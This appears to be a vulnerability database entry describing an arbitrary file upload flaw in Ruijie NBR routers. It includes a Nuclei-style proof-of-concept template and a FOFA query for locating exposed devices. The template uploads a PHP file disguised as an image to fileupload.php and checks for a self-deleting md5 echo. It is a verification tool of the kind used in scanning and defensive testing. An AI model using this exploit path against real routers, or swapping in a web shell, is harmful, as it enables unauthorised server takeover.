漏洞描述
Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
ruijie-nbr-fileupload: Ruijie NBR fileupload.php - Arbitrary File Upload
PoC代码[已公开]
id: ruijie-nbr-fileupload
info:
name: Ruijie NBR fileupload.php - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
metadata:
verified: true
max-request: 2
fofa-query: app="Ruijie-NBR路由器"
tags: ruijie,fileupload,intrusive,nbr,vuln
variables:
filename: "{{rand_base(6)}}"
string: "ruijie-nbr-fileupload"
http:
- raw:
- |
POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: image/jpeg
<?php echo md5("{{string}}");unlink(__FILE__);?>
- |
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body_2
words:
- '{{md5(string)}}'
# digest: 490a004630440220613152907369d5e34cbea0471488a6dc152b6e44f2ebf98ccde1d35299796449022037383082afa2d3a33cfc261e498fb206d9210dc0d81793747f9aea4c542e7b43:922c64590222798bb761d5b6d8e72950